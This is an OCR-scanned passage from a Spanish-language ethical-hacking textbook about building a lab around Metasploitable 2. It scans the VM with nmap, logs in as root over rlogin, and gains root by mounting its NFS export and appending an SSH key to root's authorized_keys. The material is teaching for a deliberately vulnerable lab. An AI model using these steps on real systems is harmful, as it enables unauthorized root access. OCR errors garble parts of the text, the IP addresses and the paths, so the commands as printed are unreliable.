1.17. El comando ifconfig en Metasploitable te informa que la direcci6n IP asignada a la maquina virtual es 192.168. 1.101. Luego de algunas lineas, presiona las teclas CTRL+C para cancelar el ping y ver un resumen. ere eee ey Dror ners) dropped 2 overruns 0 frame 0 Pee ee ONO) TX errors 0 dropped @ overruns @ carrier @ collisions @ Te aa Com) seme ester mere st rs eee Cc eer ST 3) RX packets 8 bytes 396 (396.0 8) SOR mea eae Re) TK errors @ dropped © overruns @ carrier @ collisions 0 $ ping 192.168.1.101 PING 192.168.1.101 (192.168.1.101) 56(84) bytes of 4 CUT e eR ee terre eM etl era ay eR ee Ue erm rem tet) SRT ee rerres Reon meron ie] es Ferrers eer CUR eum Re eer rere soe mr tee ir) eee e CRC Reet Tre mre hog ee ee Rete tC er eee rte ery Reem eee Tree ert ects bytes from 192,168.1.101: icnp_seq=8 ttl=64 tine=0.641 eee eet ET peer bytes from 192:168.1.101: icnp_seq=10 ttl=64 tine=0.532 ms 192.168.1.101 ping statistics — packets transmitted, 10 received, @ p: otra ret min/avg/max/ndev =" 0.479/1.038/5.036/1 a Figura 1.18. En esta imagen se observa que se transmitieron 10 paquetes y ninguno de ellos se perdid. 1. gQué se necesita? Actividades Acontinuaci6n veras las preguntas y los ejercicios que deberias saber responder y resolver, para considerar aprendido el capitulo. Test de autoevaluacion 1. éQué son las pruebas de penetracién? 2. Qué es Metasploitable? 3. gPara qué sirve Kali Linux? Ejercicios practicos 1. Instala VirtualBox en tu sistema operativo. 2. Configura tu laboratorio de pruebas. 3. Crea una maquina virtual. 4. Configura una maquina con Metasploitable en VirtualBox. Capitulo 02 Vulnerabilidades y pruebas En este capitulo conoceras qué sistemas vulnerables adicionales puedes utilizar en tu laboratorio y, también veras qué son las pruebas de penetraci6n y como se realizan. Sistemas vulnerables / 36 Metasploitable 2/36 Puerto 24 Puerto 6667 Otras puertas traseras EY las contrasefias? Metasploitable 3 / 47 Prueba de penetracion / 48 Black Box / 49 White Box / 49 Grey Box / 50 Actividades / 51. Test de autoevaluacion Ejercicios practicos 2. Vulnerabilidades y pruebas Sistemas vulnerables % Como se ha visto en el capitulo anterior, necesitas contar con un laboratorio de pruebas que te permita identificar vulnerabilidades en equipos que no sean de produccién ni tampoco de terceros, solo de esta forma no te encontraras con complicaciones legales a la hora de ejecutar las tareas 0 los andlisis de seguridad necesarios. Un laboratorio de pruebas es la mejor opcidn para practicar los conocimientos y las técnicas de penetracion. Por suerte no es necesario que este laboratorio sea fisico, basta con varias computadoras conectadas en red y un amplio espacio dedicado a ello. La realidad es que, gracias a las ventajas que te proporciona la virtualizaci6n, resulta posible tener tu laboratorio de pruebas en forma bastante sencilla. Para ello, necesitas crear una maquina virtual vulnerable en forma personalizada o también puedes descargar una maquina virtual vulnerable ya configurada. En el capitulo anterior descargaste e instalaste Metasploitable, pero existen otras opciones virtuales que han sido creadas con la inclusion de vulnerabilidades en forma especifica, por lo que pueden ser usadas para entrenamiento y aprendizaje de temas relacionados con la seguridad, el hacking ético, la realizacién de pruebas de penetracion 0 el andlisis de vulnerabilidades, entre otras. Metasploitable 2 La maquina virtual Metasploitable 2 es una versi6n de Linux que ha sido configurada de manera intencional con algunas vulnerabilidades, por lo tanto, es adecuada para probar la ejecucidn y el funcionamiento de aplicaciones de seguridad y, de esta forma, encontrar y demostrar vulnerabilidades. La segunda version de esta maquina virtual contiene mas vulnerabilidades que su primera versi6n, por eso, puede ser el siguiente paso en tus tareas. Se trata de una maquina virtual compatible con VMware, VirtualBox y también con otras opciones de virtualizaci6n. Una vez que este sistema haya sido virtualizado, puedes iniciarlo y, cuando requiera los datos de inicio de sesi6n, utiliza los siguientes: Usuario: msfadmin Contrasefia: msfadmin Lo primero que puedes hacer es ejecutar el comando ifconfig para identificar la direcci6n IP asignada. msfadmin@metasploitable:~$ ifconfig Veras algo como lo siguiente: eth@ Link encap:Ethernet HWaddr @0:0c:29:9a:52:c1 inet addr:192.168.93.101 Bcast:192.168.99.255 Mask: 255.255.255.0 inet6 addr: fe8Q::20c:29ff:fe9a:52c1/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:15@@ Metric:1 La direcci6n IP esta indicada después de inet addr, en este caso 192.168.93.101. Lo siguiente que puedes hacer es identificar los servicios de red que se encuentran abiertos en esta maquina; para ello usa el escaner de seguridad Nmap y asi obtendrés un listado de los puertos TCP en la instancia de Metasploitable 2. En este caso solo se usaré Nmap a modo de ejemplo y mas adelante se explicara mas a fondo. Ejecuta el siguiente comando: 2. Vulnerabilidades y pruebas nmap -p@-65535 192.168.93.101 Obtendrds un resultado como el siguiente: Starting Nmap 5.61TEST4 ( http://nmap.org ) Nmap scan report for 192.168.93.101 Host is up (@.00028s latency). Not shown: 655@6 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 8@/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 3632/tcp open distccd 5432/tcp open postgresql 590@/tcp open vnc 6000/tcp open X11 6667/tcp open irc 6697/tcp open unknown 8009/tcp open ajp13 8180/tcp open unknown 8787/tcp open unknown 39292/tcp open unknown 43729/tcp open unknown 44813/tcp open unknown 55852/tcp open unknown MAC Address: @@:@C:29:9A:52:C1 (VirtualBox) Como ves, estos servicios proporcionan un punto que puede utilizarse como. entrada remota al sistema. Mas adelante, en volamenes posteriores de esta coleccién, aprenderas a explotar estas vulnerabilidades. Si pones atenci6n en la lista anterior, los puertos TCP 512, 513 y 514 estan configurados para que se permita el acceso remoto desde cualquier equipo. Para probarlo desde una maquina Ubuntu, debes asegurarte de que el cliente rsh-client se encuentre instalado y ejecutar lo siguiente como root. Si ves que se solicita una Ilave SSH, las herramientas rsh-client atin no han sido instaladas. # rlogin -1 root 192.168.93.101 Last login: Fri Ago 1 00:10:39 EDT 2012 from :@.@ on pts/@ Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 root@metasploitable:~# 2. Vulnerabilidades y pruebas Acontinuacién puedes usar rpcinfo para identificar NFS y showmount -e para determinar que el recurso compartido / sea exportado. Para continuar son necesarios los paquetes rpcbind y nfs-common. root@ubuntu:~# rpcinfo -p 192.168.93.101 program vers proto port service 1@0000 2 = tcp 111 portmapper 1@0000 2 udp 111 portmapper 100024 1 udp 53318 status 100024 - tcp 43729 status 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 1¢0003 4 udp 2049 nfs 100021 1 udp 46696 nlockmgr 100021 3 udp 46696 nlockmgr 100021 4 udp 46696 nlockmgr 109003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 1@0003 4 tcp 2049 nfs 100021 1 tcp 55852 nlockmgr 100021 3 tcp 55852 nlockmgr 100021 4 tcp 55852 nlockmgr 100005 1 udp 34887 mountd 100005 1 tcp 39292 mountd 100005 2 udp 34887 mountd 1@0005 2 tcp 39292 mountd 100005 3. udp 34887 mountd 10@0@5 3. tcp 39292 mountd Ahora con showmount -e: root@ubuntu:~# showmount -e 192.168.93.101 Export list for 192.168.93.101: Podrias obtener acceso a un sistema como este. Para ello genera una nueva llave SSH en el sistema atacante, luego monta el export NFS y agrega la llave creada al archivo authorized_keys del usuario Wot: root@ubuntu:~# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. root@ubuntu:~# mkdir /tmp/reet root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/reat/ root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r@@t/root/. ssh/authorized_keys root@ubuntu:~# umount /tmp/reet root@ubuntu:~# ssh root@192.168.93.101 Last login: Fri Ago 1 00:29:33 2012 from 192.168.93.128 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 root@metasploitable:~#

También podría gustarte